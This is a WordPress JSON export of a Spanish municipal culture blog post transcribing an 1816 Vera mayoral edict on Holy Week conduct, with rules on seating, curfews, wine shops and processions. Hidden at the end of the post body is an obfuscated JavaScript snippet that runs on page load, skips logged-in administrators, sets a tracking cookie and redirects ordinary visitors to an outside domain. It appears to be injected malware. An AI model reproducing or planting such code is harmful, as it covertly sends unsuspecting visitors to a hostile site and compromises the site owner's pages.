{"id":2650,"date":"2017-10-12T11:26:04","date_gmt":"2017-10-12T11:26:04","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=2650"},"modified":"2018-01-15T10:30:27","modified_gmt":"2018-01-15T10:30:27","slug":"1816-bando-de-alcaldia-sobre-la-semana-santa-en-vera","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2017\/10\/12\/1816-bando-de-alcaldia-sobre-la-semana-santa-en-vera\/","title":{"rendered":"1816. BANDO DE ALCALD\u00cdA SOBRE LA SEMANA SANTA EN VERA"},"content":{"rendered":"<p class=\"western\">Transcripci\u00f3n de un curioso Bando de Alcald\u00eda del a\u00f1o 1816 conservado en el Archivo Municipal de Vera referente a las normas que deb\u00edan seguirse para la celebraci\u00f3n de la Semana Santa en las calles de Vera.<\/p>\n<p class=\"western\"><!--more--><\/p>\n<p class=\"western\"><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\"><b>BANDO DEL ALCALDE MAYOR DE VERA<br \/>\n<\/b><\/span><\/span><\/p>\n<ol>\n<li>\n<p class=\"western\"><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\">D. Diego Miguel S\u00e1nchez Torres, Regidor Perpetuo, Decano y Regente de la<\/span><\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\">Real Jurisdicci\u00f3n Ordinaria de esta Ciudad de Vera.<\/span><\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\">Hago saber a todos los vecinos estantes y habitantes en esta Ciudad de cualqui_<\/span><\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\">er condici\u00f3n o calidad que fueren, como para la quietud p\u00fablica y buen orden que se debe<\/span><\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\">observar en los d\u00edas de Jueves y Viernes Santo, evitando los excesos experimen_<\/span><\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\">tados en semejante tiempo, distray\u00e9ndose de la devoci\u00f3n que es correspondiente, he manda_<\/span><\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\">do se guarden los cap\u00edtulos siguientes:<\/span><\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\"><b>1.\u00ba<\/b><\/span><\/span><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\"> Primeramente, que ning\u00fan hombre se siente en la Plaza en los expresados d\u00ed_<\/span><\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\">as para ver las funciones en medio, ni donde lo est\u00e9n las mujeres, pues por<\/span><\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\">ning\u00fan motivo se han de mezclar unos con otras, bajo la pena al contraven_<\/span><\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\">tor de dos ducados y de proceder a lo dem\u00e1s que haya lugar.<\/span><\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\"><b>2.\u00ba<\/b><\/span><\/span><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\"> Que no se vendan en la Plaza Garbanzos, Turr\u00f3n, ni otras cosas semejan_<\/span><\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\">tes en los dichos d\u00edas y sus noches, bajo la misma pena al que lo hiciere.<\/span><\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\"><b>3.\u00ba<\/b><\/span><\/span><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\"> Que en la noche del Jueves Santo, luego que se haga se\u00f1al de las Diez, to_<\/span><\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\">das personas se retiren a sus casas, sin andar por las calles solas, ni en cua_<\/span><\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\">drillas, ni menos se queden en la Plaza con pretexto alguno, bajo la pena de<\/span><\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\">un ducado.<\/span><\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\"><b>4.\u00ba<\/b><\/span><\/span><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\"> Que las Personas que lleven bocinas y sordinas no usen de ellas en<\/span><\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\">la expresada noche, hasta que salga el Sol, bajo la pena de dos ducados.<\/span><\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\"><b>5.\u00ba<\/b><\/span><\/span><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\"> Que los Estancos de vino y aceite y aguardiente se cierren precisamente luego<\/span><\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\">que den las nueve de dicha noche y que no se abran para despachar persona algu_<\/span><\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\">na aunque suponga necesidad, a menos de que no (<\/span><\/span><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\"><i>sic<\/i><\/span><\/span><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\">) haya permiso judicial,<\/span><\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\">ni menos consientan se sienten en ellos a conversaci\u00f3n, pues luego que se<\/span><\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\">despachen, deber\u00e1n retirarse, bajo la pena de cuatro ducados y tres d\u00edas de c\u00e1r_<\/span><\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\">cel al que contraviniere en alg\u00fan modo.<\/span><\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\"><b>6.\u00ba<\/b><\/span><\/span><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\"> Que en el acto de la Procesi\u00f3n todos los Hermanos vayan con la mayor<\/span><\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\">modestia y silencio, cubierto el rostro con el capirote, porque por este medio se<\/span><\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\">advierta buen orden, bajo la pena de un ducado: y de la de dos se proh\u00edbe el que<\/span><\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\">suban gentes a los terrados.<\/span><\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\">Cuyos cap\u00edtulos se observar\u00e1n puntualmente por estos vecinos y moradores, sin contrave_<\/span><\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\">nir en manera alguna bajo las penas impuestas. Y para que ninguno alegue<\/span><\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\">ignorancia, se fija el presente en Vera a diez d\u00edas del mes de Abril<\/span><\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\">a\u00f1o de mil ochocientos diez y seis.<\/span><\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\"><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\">Diego Miguel S\u00e1nchez Torres (<\/span><\/span><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\"><i>r\u00fabrica<\/i><\/span><\/span><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\">)<\/span><\/span><\/p>\n<\/li>\n<li>\n<p class=\"western\" style=\"text-align: left\"><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\">Por mandado de Su Merced, Juan de Haro (<\/span><\/span><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\"><i>r\u00fabrica<\/i><\/span><\/span><span style=\"font-family: BernhardMod BT,serif\"><span style=\"font-size: small\">)<\/span><\/span><\/p>\n<\/li>\n<\/ol>\n<p style=\"text-align: right\">12-04-2017<\/p>\n<p style=\"text-align: right\">Transcripci\u00f3n de Manuel Caparr\u00f3s Perales<\/p>\n<p style=\"text-align: right\">Archivero del Excmo. Ayuntamiento de Vera<\/p>\n<p><script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Transcripci\u00f3n de un curioso Bando de Alcald\u00eda del a\u00f1o 1816 conservado en el Archivo Municipal de Vera referente a las normas que deb\u00edan seguirse para la celebraci\u00f3n de la Semana Santa en las calles de Vera.<\/p>\n","protected":false},"author":7,"featured_media":2653,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[109],"tags":[207,206,268,18],"class_list":["post-2650","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-historia","tag-alcaldia","tag-bando","tag-s-xix","tag-semana-santa"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/2650","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=2650"}],"version-history":[{"count":4,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/2650\/revisions"}],"predecessor-version":[{"id":3417,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/2650\/revisions\/3417"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/2653"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=2650"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=2650"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=2650"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}